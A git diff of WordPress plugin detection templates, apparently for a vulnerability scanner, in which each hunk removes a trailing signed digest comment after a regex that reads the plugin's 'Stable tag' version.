a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index f0b3f79031..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201799d8a94ce22bf7cf99f3c8450c2e937be6f66192805e298532c94ee954210e02205ea5d3fca8b413839428608851fa515f7fd295c5a4b6afc8ee777458fa030060:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 44ea1dbcb9..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100954177c7c3ff00dc2b23016a6257df804e09a3475dd68a8b575f0ca7719a57e1022100d4bf7bb652d46078bef03e1a8ffe6aed770df0eef4f3dc2b21aca1c4a7409154:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index d48ccb5699..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ec9f14631751e9d7d9ca7016d4d6f5cfcb86e2ba1e04754049203ad0d635232a02200cb3b68c4f22bb27281b26cb7942878dc44510a4260e321ff88c6bb03711e044:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 2608dc3b38..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ddaf189c1da43d587a78ef34642bbbb1afb410bda97353493034cb20dbbd8247022021d416688db147f44a42e543e131cd892089d27d8bab99d05044d7ef53cbbd4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 61e4228427..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220242454e81bd078fa4a7aade778d7b643a3a0953066ea2ba1d93d829e127a919002201584938833053ec90971f3a43461382d7077f556bc7609cbc7b9448b5b72dde9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index fa3213d527..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d35d966444cac28205e2b659eb22cdb1fa35a5ba382db0920c14c6ca87e24b6c022100d31db9cc038df0f20fb5913bbfc048dc5c2fb2fce2a5740917f4b248f79053ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 7012a839ca..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a359be731109694fb8396d1ce1af85eda35039c15cd29e4c1b0a2b31af089ff802202ea676b63e3d16a739ab2c9f5a798a04cf3680c521c19c12978c0cb04226cf2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 1eef32a8ca..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203dcebe16e2ad3c63d66eadeaafdc1aba09dbe6df371808235fb1e98d0f6a38dc022100dbe03a4226fda70d38bd1d8aa521b83803cc016c297cb51d2793f5ae4f12a302:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 6ab1d1d333..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210096161e35c8ca14d93a86e1695a14fd8d3176388d643116191f5a05b0304952eb02204a4a269eab85fac2e61b31808afb4cba7f47b495453efd880245be36628867d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index e7367537b3..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100828ddb591c3fc1ca32d0b8042fc2a73f048e640133b64870b749d63bce06844702207896bf261b86a5a6be652bfaa3c2227569b69b4faa37a6460260cdc95d09f018:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index cac90f45b2..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022070d8965f6af9f7b6a6209a11f434a548258ea11abd7138c2a5d79cee62426a8a022100f29cb111ac1540a3648015d2c01d38e724bde924099829948cc4407cbf52c5bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 5dc0243d21..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008efa2029f8471a308bf6a395969dc8a8d7ab832d74454dd7c5291a8c586a5169022100e4ccc98dacd702563c142c38c71f4043274d732b49da207e6698b60b5cb6084b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index f867ed6b50..d94b4228a9 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aa48d5a0bafa5448f6259b538d5a51497504fa25e06b7346782f63734bb3b4a4022051db3b69eb971479f8175d8ed008b42bf9ac086577edca6422c05cb7bd0414b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 9e68627f39..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205e05453626067604514439ce88ac841f11c29eccfb1a32d8e992b472e40c8dc50220158d12364917278c8ec698a019f95ac2b0ffa1abdee665103b419b0914d0aba4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index b9deff38d8..1b4769d0a7 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fbebdf973b7357c0a9385b0402ac504939cd11f95644d7c0168001b900b1fcc002204d3ed408c0f19f818f5999994704e11cc8497228d217e8b914b35915f5c4faff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 347a5026b8..c2cd4ede1b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b2b7d97b5ca37851205d9ea837372dd733017d80c1ba0138b35563e7a5c90a8c02201e448682a8ed0eea911b12aa7acad061576cee34ada274b555e811c7790ac85d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index ee7f9b01a3..03e6c13ec5 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022077468a1cbab36d6dd4a98a237a7022088bf9ae0df7b5b2d40b9af309793be6c502205bed78e4182d1ccff6b736d40c8872822a21ad0a51729a98c28207ce7b9e983d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 63d68805aa..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b56594cc6447ce74e869f057de1c4c91d7a6274b66d584749cdb9f327f3aed63022100ea0a2176734c4cbb75464fd5bf31dd545d2d65b187ca609633fdecb295c35672:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 9f5f57c014..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022002c21eda5db51608d394ab1712f37bc7906e1cc2fb780dd21ca0deba79a420cc022100ed6ae9120af856c1bf05f11d6c4bcb0cb97e1897b98445cefc92b45ce0c713f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index aaf5a00e0c..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e41871db9ccd5c1326ed9019c39f2fb7b7840b474910cbc32b3b659a91e9a8f8022100eab6474e1b162ca814000f163c3414b63ef4d46c0279dcb07e3af188e60253d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 376e27259b..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220455a2fc2ea4ebc9b59db2fb4f18abcb5bb5b57e5b2280ccf0dabc8b4dcb017b602205ee87d2b1656f0ed6794e6c54665f1c2494dd83f9f477056888e983812436d74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index f7e09176b3..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210091ea1a91581ac8846426745a7686e83e151a5dfdcf3206edbdc714e3719ed56202201f5b039fe2a6e07762fd6d3f9fab969b538b1080cb359b839965fc164c370c7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index ff60f8f3f3..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ec322d72a46776edb188d61990fca5fc239303c6f32b5d4bf886529c93703334022100f1eff7de0274cc1f0eb62e65c5980f2d281af2171088b0430ccdfd12970a8ac4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index ef4acc6513..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022039d1c47ccbf7fd2bfb473fade58f18ace1b79e69d53677789a85d1aec12e70e202203a07798a204cd8685a7079b56dbafd1f9f366cbffaa41eb463d8f094023ffb44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 61edef5a6d..d74de07e8e 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220202a24d0a7f567ae82ddf5c9f3702476f00d0b16d12671c498475e4f55eb20d102204f5ff3b554dc4e99d6d85d1d78ffa88f60a9b862fd115addbbd810b6db86c2e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 8267425460..e5cfe47925 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022061ea3068f2d108c44d5411faa6f1162ab6750795b70abe6c5a282e513f940fed022100c00de8d5c1ff899529dcda775405b122756abec1890e6d9504c882ec2cf0952e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 86853ee94b..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d5a4cb9e71c85a0698726b4af8bfa3746f589732f8b9f2aa64d1d4d88b5eea210220165db6310ffdea8cb1e4cad5e86b3806a9994297d3e34e75caa599836add08d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index b930659d09..a1616c1741 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d12c37a44e2cc085f4862eac8d594cccdfc4365136c72f7e1238530ae166d30b022100fdd5336729da1d12e7b279fd56586231961ec860cf2c7cabd32c182b73ec7c18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 4d66de3437..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ed888b1aa1f13d6afb907ed4f24f8834540776268a8b0b9ddb0fd8195dfd743a022100cf0ee11df0345cbbcadd7108750023aad8aa70848162ef8b8f6e5a8bee7970fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index b7840e19e9..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f411fb1e4f21d4582b0ed0d82e4672e5e15b5134c5945ce93364bc192f980a3302204d6b1cb299cec54537c7c125ef2760c05c850efe686bdd7a955025cccd540390:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index d50ddcc36d..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009cc177f3409e659c78dae0999eaf984ba009aa440468d582ab6a6f4852a3e904022100968095d7a8822b8e181a48f8d747272b3319574029a8586894d0a7a32d4d1d13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 96816cf693..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f7c798b84b17fad244c5c8781416f14dac9d3890e9708bcf58091f026ab63939022073efdd63ecae80d3bc1206c637bcfdbdfb10ac42a2664b136789f706512fede1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 5d0e29cb73..d86e0557ae 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f8378c63b752139f31f812eaa0400bfdbb80109a6cca08ae9dc4f2524da108a802207505de6b9c31b75040e03f5d43c8c522db0c03fc9feb30f0ef05d467181b2f3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 08d1224c13..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022031aaeeb0a2ec6e54088b860d3195e1e393c48cdae89373da4beaabb27754e8f7022100f4eba7ceba342e6d5b0ca48da1041da3fe2ee4a463aee33ba3c33e8574266e7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 1c04e90fb8..4ae34395fa 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009fa13c98374aa2fa007cfb3ed671307e40455d25953e5946a3a5d58b882170aa02207ba9db49b1b9abb82ffc535aae2576c9fd1f165f1d242938dcf27f6ff8069afd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 5bbb1c2c9d..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022067795c43581195d4e6a43b398ae1499194b4fb5037ae3adf2739a4957c1969480220226bde90ebdc5eca401cca9f320774210485d6b5d75a77714a25a46e4391ad4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 7041c8540f..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b687b83829bdf79b5f0d80431060e7df933781eb09704c743460b42e057cfc48022100dc50685e1fd3264e4396efd9fa7c6314380b2612004fa9aa324f1f3bb4cc597c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 9242b830ae..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e8e2efe7868fc97ab0dc4ce69442a3ea120a83fe9f25cebf4215f59f2097b1d4022100b4e3f0dcd205ac4f97c383d06c30e7fbea1952d35be58cdd2c403c944f522352:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 374b2202c1..aa36122d85 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f63f73a7e7d1cffef16bfe81bc5f8c9b191960c7285c42322b06c46741fca37b022100c39f1edae713d8542e65cb56398e0b0ad7557cbae6ff118c08a77891ea47b026:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 737f4022a6..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204ab494d9d5bdf187fd8c55c374e07cdf2c0c3d0d0c421a0ae100acef6231c8070221009f370258920e98ee7e4dcd25c25760786ceaeeebaf0dad5cf93106493ce29938:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 328286c8ba..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c8441d14fb05c4392069adc4d67a8deb246d298fce862fd3e315cf83c1ddf40502200c898f8a5dda33a86316bbaef19d0d77787a58e8eed2b51214c24758dbaf12d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 02346ee763..1d00a5705d 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202609cc0f6c988b69a2d0599d9ce5c064eb53a6edae2440d77243bedd9f8f7b53022100f9bc27f785d2f6cb0e6d5921117d37dd6597ea94cbed89007b70ac09802cad4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index b92828bc38..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008816c9223b50894c0a803625530488f0a5253e02227e335b8beb64969010c298022002b6c317506f75a311a191173eb711796f2b27ac95bd8a5016fdef6c7ec8db83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 2411ac83fb..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205b94d9411d9fbf77a2b3ca0eb428dc719ec7c9f9b72a485fa215ae97549023e1022060bc5ede931f33639d5bb390c58064c0e04b245c74c42146d8eedd867d0d6576:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index ecc3bb3431..3dbb03067b 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202dbfe379bd137310072dff4cdaf14551d7f097433d33e0c63988969858d80d190220778c3afffd15796da16fe462c9574ffe166ec87a6978fbbd9e2d0349a996587d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 0ab8decf36..7ed171d662 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f30d414d9733a066b3b429ec514f483d5df4b99305ee5c97dd909c02b3fbd1a402207deb18e6e392dba1c44f955c69d32a19de716b71fccfe2bfe779ae407f4ad70a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index e95e41cc17..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 